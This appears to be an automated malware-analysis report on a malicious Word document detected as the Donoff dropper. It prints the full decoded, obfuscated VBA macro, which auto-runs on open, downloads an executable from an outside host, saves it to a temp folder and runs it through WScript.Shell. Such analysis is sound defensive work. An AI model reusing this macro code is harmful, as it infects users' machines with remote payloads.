Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c23433c795daf5b1…

MALICIOUS

Office (OLE)

82.5 KB Created: 2016-05-12 23:07:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: f8c69d16676de9fd8303d12f4e4545e8 SHA-1: 275e2a6cbcc0893e3a2919a9fd5fe217d232a1c2 SHA-256: c23433c795daf5b1db047756c994fdc3c2b5c0354e7b743ee98046bff612a9ff
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes upon opening the document. This macro utilizes `CreateObject("WScript.Shell")` and `Shell()` calls, indicating an intent to run external commands or scripts. The presence of `WScript.Shell` usage and `Document_Open` macro firings strongly suggests a downloader or dropper functionality, likely fetching and executing a secondary payload. The ClamAV detection of 'Doc.Dropper.Donoff-5743530-0' further supports this dropper classification.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim GYPPhgwSJI As Boolean, FxaIym As String
    Set QIeYwGQcDT = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim GYPPhgwSJI As Boolean, FxaIym As String
    Set QIeYwGQcDT = CreateObject("WScript.Shell")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
    CallByName yfRxWaL, vwIihNHwRg, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Private Sub Document_Open()
    Dim rayiAM As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8685 bytes
SHA-256: 1c23a46288108a13cf6f10958bcb1ee11ef9e25ccabdd5c7f7880e2e128d3026
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 219 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WYdZurj(ByVal nUPyPDdceo As String, ByVal TPRpbPmQCS As String)
wHTiRT
If mjspzU(9002, 675, "ZslO") Then
jGxNa True, "qVEIN", "dYuq"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub pqGeLr(ByVal DfeiPY As Integer)
YoQROe 280, "rEm", 3880
nSBNYIEqi
szgGkotf 3197, "s7cGX", True
End Sub
Private Sub Document_Open()
Dim rayiAM As Boolean
ziCyGtLhET.tEuAnmnNoX
End Sub
Private Sub lWyprRWv()
mqxGfUKgzi 6499, "JiAz", "h0jWb"
MmaltzrlX 1715
If hBTkqIt("") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function JZUPIUj() As String
yhlAeROGu
JZUPIUj = "IX6wT"
End Function

Attribute VB_Name = "HBSZwovgJ"
Private Sub kNtGZ(ByVal wKkcxXjA As Boolean, ByVal qGtxzruvA As Integer)
JdrgwQ
End Sub
Public Function QIeYwGQcDT() As Object
Dim GYPPhgwSJI As Boolean, FxaIym As String
Set QIeYwGQcDT = CreateObject("WScript.Shell")
End Function
Public Function xOEKtLwVn() As Object
Set xOEKtLwVn = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub gJYxp()
If euVWF Then
EqgCajclK 1379, False, "3b3t4"
End If
End Sub
Private Sub TYdqFrJ(ByVal vPiqaehkDU As String)
rwKYqDFg True, 2503
End Sub
Public Function MMFNY() As Object
Dim TAtuyTiY As Boolean
Set MMFNY = CreateObject("ADODB.Stream")
End Function
Private Function jqnkUUK() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "tfzt", "MT", 3231
jqnkUUK = 5750
End Function

Attribute VB_Name = "knodiW"
Public Function xDoszvxfJ(ByVal oQueYF As Integer, ByVal nyOGqE As Integer, ByVal wgQCT As String, ByVal phBpFKg As String) As String
Dim STjqUuQx As Integer, PsDspeSF As Integer
xDoszvxfJ = Mid(phBpFKg, oQueYF, 1)
End Function
Private Sub BNaEHg(ByVal zGXTd As Integer, ByVal TqsaoB As String)
BkMTwPAnUV "2aaR", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "lqc", "RiKq"
End If
nnWkkdeYWI "fH3q", "9kA", False
tvremm "2Za", "eej89", True
End Sub
Public Function NRSYHMIx(ByVal QkQiSpG As Integer, ByVal xFAMLNG As Boolean, ByVal QYvmLrB As String, ByVal cEOct As String) As String
NRSYHMIx = cEOct & QYvmLrB
End Function
Public Function fUwaMiNol(ByVal ySfnfgt As String, ByVal bazlEjPf As String) As Boolean
Dim naWyzQDkE As Integer
fUwaMiNol = InStr(1, bazlEjPf, ySfnfgt)
End Function

Attribute VB_Name = "tirUirwi"
Private Function sRGXI(ByVal UiDLFqDMy As Boolean, ByVal lvuJZD As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
sRGXI = False
End Function
Public Function OThwuG(ByVal rkxaUcqY As String, ByVal nMlOzdDx As String) As String
Dim OjWyjKn As Boolean
Dim BdLPTw As String
crcNfikH = "hAox"
For RTVIyfIss = 1 To Len(rkxaUcqY)
OjWyjKn = knodiW.fUwaMiNol(knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), nMlOzdDx)
If Not OjWyjKn Then
OThwuG = knodiW.NRSYHMIx(2102, True, knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), OThwuG)
fitPL = ""
End If
Next
End Function
Private Function rfPVXXPon() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
rfPVXXPon = 5758
End Function
Private Function pVgDS() As String
pVgDS = "Q5m"
End Function

Attribute VB_Name = "ziCyGtLhET"
Private Function oRyMOuK(ByVal BaLAefKDY As String, ByVal vHzzGv As String) As String
Dim VcSZuhfau As Integer
Set aGTjzuX = zivWxP.dcKBLbGs(SAcpVcW, HBSZwovgJ.QIeYwGQcDT, tirUirwi.OThwuG("P3RAWOVCVES3VS", ".A3VW"))
oRyMOuK = aGTjzuX(BaLAefKDY)
End Function
Private Function yxnGhEe() As String
yxnGhEe = tirUirwi.OThwuG("OYp4eCnC", "CY4 ")
End Function
Private Function SAcpVcW() As String
SAcpVcW = tirUirwi.OThwuG("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function xgiYagx() As String
xgiYagx = "1FaH"
End Function
Private Sub hfZqCeGBC(ByVal qaFAJ As String, ByVal QhYhbt As String)
Set zYVIGSsck = HBSZwovgJ.xOEKtLwVn
zivWxP.mAcTRLD ejEmLhof, tirUirwi.OThwuG("OYp4eCnC", "CY4 "), qaFAJ, zYVIGSsck, False
zivWxP.AgrPU tirUirwi.OThwuG("UJsJJerj-JJAjgJeJnGt", "GJj"), vaDCWQGexY, 2963, tirUirwi.OThwuG("MQCoJzXilgClYaX/C4C.g0 C(CXcoXmYYpYatYiQbgYlYe;C)g", "YJXQCg"), LEhcc, zYVIGSsck
zivWxP.JBGqPB 1177, zYVIGSsck, HCFxEEPND
ZWBbn True, 6317, QhYhbt, zivWxP.LRpuX(LEhcc, LgDWFy, zYVIGSsck)
End Sub
Private Function LgDWFy() As String
LgDWFy = tirUirwi.OThwuG(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub EiLevE()
Dim cIPEyduG As Integer
OIRUtHf = True
On Error GoTo xeSTzm
zIxdob = False
hfZqCeGBC wnEiH, gRFLC
SeYuJBojru gRFLC
Exit Sub
xeSTzm:
End Sub
Private Function gRFLC() As String
Dim YNmOHLMBF As Integer, hIKrUpMu As Integer
gRFLC = oRyMOuK(tirUirwi.OThwuG("ZTEUMZsP", "9cZUsX"), "nf") & oycrPfMb
End Function
Private Function TGGrY() As String
TGGrY = tirUirwi.OThwuG("nTyHpaeB", "HBaqXn")
End Function
Private Function oycrPfMb() As String
Dim YvsChVwYth As Integer
Dim AkGou As Integer
JJNlxuFaS = True
oycrPfMb = tsIVRe
End Function
Private Sub SeYuJBojru(ByVal ONtWMv As String)
zivWxP.YVjBqrLyxJ "if", HBSZwovgJ.QIeYwGQcDT, 7188, ONtWMv, tirUirwi.OThwuG("kEx2eI1c", "k31IG2")
End Sub
Private Function LEhcc() As String
LEhcc = "D9k"
End Function
Public Sub tEuAnmnNoX()
Dim JhZBmFQNK As Integer
Dim qKwvGumloC As Boolean
kZsag = 4121
EiLevE
End Sub
Private Function FzmIedRZZ() As String
FzmIedRZZ = tirUirwi.OThwuG("YClm/o/s0e", "0dY/m")
End Function
Private Function wnEiH() As String
Dim JSZINyhSId As Integer
wnEiH = tirUirwi.OThwuG("ThtDt pTB:S/T/fTSprBDe z. cT o m/BsDyD stD emB/DBcSa cThe /SBw orDdS.SeTBx e", "SDB T")
End Function
Private Sub ZWBbn(ByVal jdVfKLEFHy As Boolean, ByVal IsBrj As Integer, ByVal Gmumxvrhz As String, ByVal SOOqWKdo As Variant)
Dim oNKsSMFTa As Boolean
Dim MhlcMtb As Integer
Set urROlotAH = HBSZwovgJ.MMFNY
zivWxP.HPdra True, 1, urROlotAH, TGGrY
zivWxP.JBGqPB 1177, urROlotAH, yxnGhEe
uRUxACPwrk = 5904
zivWxP.YVjBqrLyxJ xgiYagx, urROlotAH, 7188, SOOqWKdo, tirUirwi.OThwuG("Wbbribtzek", "Zzlmkb")
sIbLjqP = "Gn"
zivWxP.AgrPU Gmumxvrhz, pqTTm, 2963, 2, xgiYagx, urROlotAH
zivWxP.JBGqPB 1177, urROlotAH, FzmIedRZZ
End Sub
Private Function ejEmLhof() As String
XBoKEL = False
ejEmLhof = tirUirwi.OThwuG("G.E TB", ".BA ")
End Function
Private Function pqTTm() As String
pqTTm = tirUirwi.OThwuG("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function tsIVRe() As String
tsIVRe = tirUirwi.OThwuG("O/7vOeiav6O62vJ32vvamf.OJexiOe", "OivJm")
End Function
Private Function vaDCWQGexY() As String
vaDCWQGexY = tirUirwi.OThwuG("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function HCFxEEPND() As String
HCFxEEPND = tirUirwi.OThwuG("SIerIndr", "MIrG")
End Function

Attribute VB_Name = "zivWxP"
Private Sub avcEIXr(ByVal DWTDS As Boolean, ByVal gDjVCb As Integer)
QzYClH "Ukt", 8941, "Ox"
End Sub
Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
CallByName yfRxWaL, vwIihNHwRg, 1
End Sub
Public Sub mAcTRLD(ByVal hyqvEXT As Variant, ByVal CyPNNcqPO As String, ByVal YGjItzV As Variant, ByVal foEFRfqWkY As Object, ByVal jtkSk As Variant)
IXNhTW = ""
CallByName foEFRfqWkY, CyPNNcqPO, 1, hyqvEXT, YGjItzV, jtkSk
End Sub
Public Function dcKBLbGs(ByVal ePoyCQ As String, ByVal VLtxeUpieQ As Object, ByVal MjhGLIcf As String) As Variant
Dim MXLUhG As Integer, bAmMXC As Integer
Set dcKBLbGs = CallByName(VLtxeUpieQ, ePoyCQ, 2, MjhGLIcf)
End Function
Public Sub AgrPU(ByVal IamjGclJY As Variant, ByVal mcmyHmAzvJ As String, ByVal McFGHaA As Integer, ByVal CmMeWqlkaz As Variant, ByVal qFoYKWTNs As String, ByVal fppFJG As Object)
CallByName fppFJG, mcmyHmAzvJ, 1, IamjGclJY, CmMeWqlkaz
End Sub
Public Sub HPdra(ByVal scsvvzFw As Boolean, ByVal EuVYIFH As Variant, ByVal TlFLzFt As Object, ByVal vzncfc As String)
CallByName TlFLzFt, vzncfc, 4, EuVYIFH
End Sub
Private Sub sfZFfFZ(ByVal nkXhelbfd As Integer, ByVal wFlNFy As Integer)
VYZRTX ""
FaPULoVT 5592, "040", ""
End Sub
Public Sub YVjBqrLyxJ(ByVal FRfgBCc As String, ByVal BoSBIxdpy As Object, ByVal vNgbfey As Integer, ByVal rvSbIsAIn As Variant, ByVal kuIPQRiG As String)
CallByName BoSBIxdpy, kuIPQRiG, 1, rvSbIsAIn
End Sub
Public Function LRpuX(ByVal wyKQFiqrlm As String, ByVal lDGcCyNh As String, ByVal iJhLFwZOdT As Object) As Variant
Dim RSTyzqKRy As Integer, UNYDxtaaT As Boolean
LRpuX = CallByName(iJhLFwZOdT, lDGcCyNh, 2)
End Function